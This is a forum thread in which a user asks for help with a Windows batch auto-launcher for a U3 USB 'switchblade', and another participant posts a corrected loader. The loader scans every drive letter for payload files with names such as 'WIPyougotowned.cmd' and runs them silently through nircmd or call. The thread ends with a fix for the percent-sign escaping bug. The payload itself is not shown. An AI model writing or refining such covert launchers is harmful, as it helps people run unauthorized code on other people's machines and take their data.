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ok. i try to make a u3 automatic launcher in batch.

the point why i started to do this, is because my boxes at home all have scripting host set to off..

i like to have a switchblade which runs everywhere.

here's my code:

@echo off

:: OK this line is searching for the payload on all available drives. It looks for the WIPyougotowned.cmd

for %%i in ( A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do @if exist %i:WIPyougotowned.cmd Set "drv=%i:"

if not defined drv goto :eof


:: This line executes the payload on the detected drive.

Echo executing payload from drive %drv%

nircmd %drv%WIPyougotowned.cmd


however this code doesnt work. it seems like it doesnt see the yougotowned.cmd.. ;(

i really need help with that


Ok. I might want to edit the tread saying "amish fixxe dit becaue he is the best

;) thanks to you dude

Here is the loader:

@echo off

for %%i in (B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:youwillbehackedsoon.txt set dir=%%i

cd /d %dir%:

call WIPCMDgo.cmd


The code is correct, and it works if you execute it by itself, but for some reason whenever i put it into a bat file, it ignores the % in "if exist %i:doc.txt", and says "i:doc.txt un expected"

Edit: for some reason, you need to put extra "%" i n...

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